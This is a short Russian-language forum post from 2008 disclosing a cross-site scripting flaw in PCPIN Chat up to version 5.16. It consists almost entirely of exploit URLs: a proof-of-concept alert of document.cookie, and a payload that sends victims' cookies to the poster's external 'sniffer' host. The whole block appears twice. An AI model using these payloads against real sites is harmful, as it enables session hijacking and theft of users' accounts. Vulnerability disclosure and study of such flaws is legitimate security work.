Qwazar
07.04.2008, 18:56
Не нашёл открытой темы, куда можно постить уязвимости движков, в общем вот, нашёл почти год назад, не помню, почему так извращался.
Type:[XSS]
Product: PCPIN Chat <= 5.16
http://sitename/chat/extern.php?ext=javascript:alert(document.cookie)
Ну, а на сниффер слал так, наверное можно и проще, сейчас лень было переписывать:
extern.php?ext=javascript:navigate('http:'.concat( '//sniffer.xx?',document.cookie))
Type:[XSS]
Product: PCPIN Chat <= 5.16
http://sitename/chat/extern.php?ext=javascript:alert(document.cookie)
Ну, а на сниффер слал так, наверное можно и проще, сейчас лень было переписывать:
extern.php?ext=javascript:navigate('http:'.concat( '//sniffer.xx?',document.cookie))